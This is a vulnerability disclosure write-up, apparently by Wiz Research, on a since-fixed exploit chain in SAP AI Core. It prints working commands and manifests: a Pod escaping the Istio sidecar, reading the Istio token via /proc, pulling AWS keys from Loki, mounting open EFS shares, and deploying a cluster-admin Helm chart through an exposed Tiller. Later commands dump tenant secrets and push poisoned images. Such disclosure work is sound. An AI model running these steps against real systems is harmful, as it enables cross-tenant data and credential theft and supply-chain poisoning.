SAPwned: SAP AI vulnerabilities expose customers’ cloud environments and private AI artifacts

Wiz Research uncovers vulnerabilities in SAP AI Core, allowing malicious actors to take over the service and access customer data.


Does AI have an isolation problem?   

Over the past months, we on the Wiz Research Team have conducted extensive tenant-isolation research on multiple AI service providers. We believe these services are more susceptible to tenant-isolation vulnerabilities since, by definition, they allow users to run AI models and applications – which is equivalent to executing arbitrary code. As AI infrastructure fast becomes a staple of many business environments, the implications of these attacks are becoming more and more significant.

We will be presenting our findings from this research project at the upcoming Black Hat conference, in our session “Isolation or Hallucination? Hacking AI Infrastructure Providers for Fun and Weights”. 

For the latest installment of this project, we researched SAP’s AI offering, aptly named “SAP AI Core.” This is our 3rd report in the series, following our research on the Hugging Face and Replicate platforms. This blog will explore the vulnerability chain and detail our findings, dubbed “SAPwned,” while also looking at the potential impact and broader takeaways for securing managed AI platforms. 

Executive Summary 

The AI training process requires access to vast amounts of sensitive customer data, which turns AI training services into attractive targets for attackers. SAP AI Core offers integrations with HANA and other cloud services to access customers' internal data via cloud access keys. These credentials are highly sensitive, and our research goal was to determine whether malicious actors could gain access to these customer secrets.

Our research into SAP AI Core began with executing legitimate AI training procedures on SAP's infrastructure. By running arbitrary code, we were able to move laterally and take over the service – gaining access to customers' private files, along with credentials to customers' cloud environments: AWS, Azure, SAP HANA Cloud, and more. The vulnerabilities we found could have allowed attackers to access customers' data and contaminate internal artifacts – spreading to related services and other customers' environments.

Specifically, the access we gained allowed us to: 

  • Read and modify Docker images on SAP’s internal container registry 

  • Read and modify SAP’s Docker images on Google Container Registry 

  • Read and modify artifacts on SAP’s internal Artifactory server 

  • Gain cluster administrator privileges on SAP AI Core’s Kubernetes cluster 

  • Access customers’ cloud credentials and private AI artifacts 

Step-by-step illustration of our research findings 

The root cause of these issues was attackers' ability to run malicious AI models and training procedures – which are, essentially, code. After reviewing several leading AI services, we believe the industry must improve its isolation and sandboxing standards when running AI models.

All vulnerabilities have been reported to SAP’s security team and fixed by SAP, as acknowledged on their website. We thank them for their cooperation. No customer data was compromised. 

Following is a technical dive into our vulnerability chain and findings. 

Introduction: The research begins 

SAP AI Core is a service that allows users to develop, train and run AI services in a scalable and managed way, utilizing SAP’s vast cloud resources. Similar to other cloud providers (and AI infrastructure providers), the customer’s code runs within SAP’s shared environment – posing a risk of cross-tenant access. 

Our research began from the position of an SAP customer with basic permissions, allowing us to create AI projects. So, we started out by creating a regular AI application on SAP AI Core. SAP's platform allowed us to provide an Argo Workflow file, which in turn spawned a new Kubernetes Pod according to our configuration.

Example Argo Workflow configuration on SAP AI Core 
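
As a rough sketch, a minimal workflow of this shape might look like the following; all names, labels, and the container image are illustrative placeholders, not SAP's actual template:

```yaml
# Minimal Argo Workflow sketch. Every name and the image are illustrative
# placeholders; the key point is that the container runs whatever we supply.
apiVersion: argoproj.io/v1alpha1
kind: Workflow
metadata:
  generateName: training-demo-
spec:
  entrypoint: main
  templates:
    - name: main
      container:
        image: docker.io/example/trainer:latest  # attacker-controlled image
        command: ["sh", "-c"]
        args: ["echo 'arbitrary code runs here'"]
```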

This allowed us to run our own arbitrary code within the Pod by design – no vulnerability needed. However, our environment was quite restricted. We quickly realized our Pod had extremely limited network access, as enforced by an Istio proxy sidecar – so scanning the internal network wasn’t an option for us. Yet.  

Bug #1: Bypassing network restrictions with the power of 1337 

The first thing we tried was to configure our Pod with “interesting” privileges. However, SAP’s admission controller blocked all the dangerous security options we tried – for example, running our container as root.

Despite that, we found two interesting configurations that the admission controller failed to block. 

The first is shareProcessNamespace, which allowed us to share the process namespace with our sidecar container. Since our sidecar was the Istio proxy, we gained access to Istio’s configuration, including an access token to the cluster’s centralized Istiod server. 

Accessing the Istio token via our sidecar container 
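
As a sketch of the technique: with a shared PID namespace (and once running under the sidecar's UID, per the next finding), the proxy's filesystem is reachable through /proc. The token path below is Istio's standard projected-token location, not necessarily SAP's exact layout:

```sh
# In a shared PID namespace, the sidecar's processes are visible, and its
# filesystem is reachable via /proc/<pid>/root when running as the same UID.
PILOT_PID=$(pgrep -f pilot-agent | head -n 1)
cat /proc/$PILOT_PID/root/var/run/secrets/tokens/istio-token
```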

The other is runAsUser (and runAsGroup). Although we couldn’t be root, all other UIDs were allowed – including Istio’s UID, which ironically enough was 1337 (yeah, really). We set our UID to 1337 and successfully ran as the Istio user. Since Istio itself is excluded from its own iptables rules, we were now running without any traffic restrictions!

Sending requests to the internal network – before and after UID 1337 
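
Taken together, in Pod-spec terms, the two settings that slipped past the admission controller look roughly like this (everything except the field names and UID/GID 1337 is an illustrative placeholder):

```yaml
# Sketch of the two Pod settings the admission controller failed to block.
apiVersion: v1
kind: Pod
metadata:
  name: escape-demo
spec:
  shareProcessNamespace: true    # share one PID namespace with the Istio sidecar
  containers:
    - name: main
      image: docker.io/example/trainer:latest
      securityContext:
        runAsUser: 1337          # Istio's own UID, exempt from its iptables redirection
        runAsGroup: 1337
```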

Free from our traffic shackles, we started scanning our Pod’s internal network. Using our Istio token, we were able to read configurations from the Istiod server and gain insight on the internal environment – which led us to the following findings. 

Bug #2: Loki leaks AWS tokens  

We found an instance of Grafana Loki on the cluster, so we requested the /config endpoint to view Loki’s configuration. The API responded with the full configuration, including AWS secrets that Loki used to access S3: 

Configuration excerpt from SAP’s Loki server 
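
Retrieving the configuration takes a single unauthenticated request; a sketch, with the host as a placeholder:

```sh
# Loki serves its full runtime configuration, unauthenticated, on its HTTP port
# (3100 by default). The storage_config.aws section of the response carries the
# access_key_id and secret_access_key used for S3.
curl http://<loki-host>:3100/config
```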

These secrets granted access to Loki’s S3 bucket, containing a large trove of logs from AI Core services (which SAP says aren’t sensitive) and customer Pods. 

Partial file list from Loki’s S3 bucket 
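
With the recovered keys, browsing the bucket is ordinary AWS CLI usage (bucket name and keys below are placeholders):

```sh
# The leaked credentials work like any other AWS access key pair.
AWS_ACCESS_KEY_ID=<leaked-key> AWS_SECRET_ACCESS_KEY=<leaked-secret> \
  aws s3 ls s3://<loki-bucket>/ --recursive
```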

Bug #3: Unauthenticated EFS shares expose user files 

Within the internal network, we found six instances of AWS Elastic File System (EFS) listening on port 2049. A common problem with EFS instances is that they are configured as public by default – meaning no credentials are needed to view or edit files, as long as you have network access to their NFS ports. These instances were no different: using simple open-source NFS tools, we were able to freely access the shares’ contents.
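
Accessing such a share takes nothing more than standard NFS tooling; a sketch, with a placeholder address:

```sh
# EFS speaks standard NFSv4 on port 2049; with a default ("public") file system
# policy, network reachability is the only requirement. The IP is a placeholder.
sudo mount -t nfs4 -o nfsvers=4.1 <efs-ip>:/ /mnt/efs
ls -la /mnt/efs    # per-customer folders containing code and training data
```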

Listing the files stored on these EFS instances revealed massive amounts of AI data, including code and training datasets, organized by customer ID:

Partial file list from two EFS shares; each folder represents a different customer ID

Bug #4: Unauthenticated Helm server compromises internal Docker Registry and Artifactory 

Our most interesting finding on the network was a service named Tiller – the server-side component of version 2 of the Helm package manager.

Communication with Tiller happens over its gRPC interface on port 44134, which is exposed without any authentication by default.

Querying this server on our internal network revealed highly privileged secrets to SAP’s Docker Registry as well as its Artifactory server:  

Container registry and Artifactory credentials – exposed by Helm server query
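
The stock Helm 2 client can be pointed straight at an exposed Tiller endpoint; a sketch, with the address and release name as placeholders:

```sh
# Tiller's gRPC interface requires no authentication by default.
helm --host <tiller-ip>:44134 version                    # confirm it's Tiller v2
helm --host <tiller-ip>:44134 list --all                 # enumerate deployed releases
helm --host <tiller-ip>:44134 get values <release-name>  # dump values, incl. embedded secrets
```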

Using these secrets’ read access, a potential attacker could read internal images and builds, extracting commercial secrets and possibly customer data. 

Using the secrets’ write access, an attacker could poison images and builds, conducting a supply-chain attack on SAP AI Core services. 
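
As a sketch of that supply-chain angle (every name below is a placeholder), write access reduces image poisoning to ordinary registry operations:

```sh
# Pull an internal image, modify it locally, then overwrite the original tag.
docker login <internal-registry> -u <leaked-user> -p <leaked-token>
docker pull <internal-registry>/<internal-image>:latest
# ...inject a backdoor into the image locally...
docker push <internal-registry>/<internal-image>:latest
```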

Bug #5: Unauthenticated Helm server compromises K8s cluster, exposing Google access tokens and customer secrets 

The Helm server was exposed for both read and write operations. While the read access exposed sensitive secrets (as seen above), the write access allowed for a complete cluster takeover.

Tiller’s install command takes a Helm package and deploys it to the K8s cluster. We created a malicious Helm package that spawns a new Pod with cluster-admin privileges, and ran the install command. 
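
A minimal sketch of what such a package's template could contain (all names are illustrative): a ServiceAccount bound to cluster-admin, plus a Pod running under it.

```yaml
# Sketch of the malicious chart's sole template; every name here is illustrative.
# Tiller itself runs with broad privileges, so it can create the binding.
apiVersion: v1
kind: ServiceAccount
metadata:
  name: takeover-sa
  namespace: kube-system
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: takeover-binding
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
  - kind: ServiceAccount
    name: takeover-sa
    namespace: kube-system
---
apiVersion: v1
kind: Pod
metadata:
  name: takeover-pod
  namespace: kube-system
spec:
  serviceAccountName: takeover-sa   # this Pod's token now carries cluster-admin
  containers:
    - name: shell
      image: docker.io/library/alpine:3.19
      command: ["sleep", "infinity"]
```

Deploying it is then a single `helm --host <tiller-ip>:44134 install ./malicious-chart` away.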

We were now running with full privileges on the cluster! 

Partial list of K8s permissions we obtained via Helm 

Using this access level, an attacker could directly access other customers’ Pods and steal sensitive data, such as models, datasets, and code. It also allows attackers to interfere with customers’ Pods, taint AI data, and manipulate models’ inference.

Furthermore, this access level would have allowed us to view customers’ own secrets – even secrets that are beyond the scope of SAP AI Core. For example, our AI Core account contained secrets to our AWS account (for S3 data access), our SAP HANA account (for Data Lake access), and our Docker Hub account (to pull our images). Using our newfound access level, we queried for those secrets, and managed to access all of them in plaintext: 

Accessing customer secrets using our K8s permissions 
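
From a cluster-admin context, this boils down to ordinary kubectl queries; a sketch, with placeholder names and keys:

```sh
# With cluster-admin, every tenant's Secret objects are readable cluster-wide,
# and their values are merely base64-encoded.
kubectl get secrets --all-namespaces
kubectl get secret <customer-secret> -n <customer-namespace> \
  -o jsonpath='{.data.<key>}' | base64 --decode
```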

The same query also revealed an SAP access key to Google Container Registry, named sap-docker-registry-secret. We have confirmed that this key grants both read and write permissions – further enlarging the scope of a potential supply-chain attack. 

Takeaways 

Our research into SAP AI Core demonstrates the importance of defense in depth. The main security obstacle we faced was Istio blocking our traffic from reaching the internal network. Once we bypassed that obstacle, we gained access to several internal assets that required no additional authentication – meaning the internal network was treated as trusted. Hardening those internal services could have minimized the impact of this attack, downgrading it from a complete service takeover to a minor security incident.

In line with our previous Kubernetes-related findings, this research also demonstrates the tenant-isolation pitfalls of using K8s in managed services. The crucial separation between the control plane (service logic) and the data plane (customer compute) is undermined by the K8s architecture, which allows logical connections between them through APIs, identities, shared compute, and software-segmented networks.

Furthermore, this research demonstrates the unique challenges that the AI R&D process introduces. AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to ensure that untrusted code is properly separated from internal assets and other tenants.

Disclosure timeline 

  • Jan. 25, 2024 – Wiz Research reports security findings to SAP 

  • Jan. 27, 2024 – SAP replies and assigns a case number 

  • Feb. 16, 2024 – SAP fixes first vulnerability and rotates relevant secrets 

  • Feb. 28, 2024 – Wiz Research bypasses the patch using 2 new vulnerabilities, reports to SAP 

  • May 15, 2024 – SAP deploys fixes for all reported vulnerabilities 

  • Jul. 17, 2024 – Public disclosure 

Stay in touch! 

Hi there! We are Hillai Ben-Sasson (@hillai), Shir Tamari (@shirtamari), Nir Ohfeld (@nirohfeld), Sagi Tzadik (@sagitz_) and Ronen Shustin (@ronenshh) from the Wiz Research Team. We are a group of veteran white-hat hackers with a single goal: to make the cloud a safer place for everyone. We primarily focus on finding new attack vectors in the cloud and uncovering isolation issues in cloud vendors. 

We would love to hear from you! Feel free to contact us on Twitter or via email: research@wiz.io.  
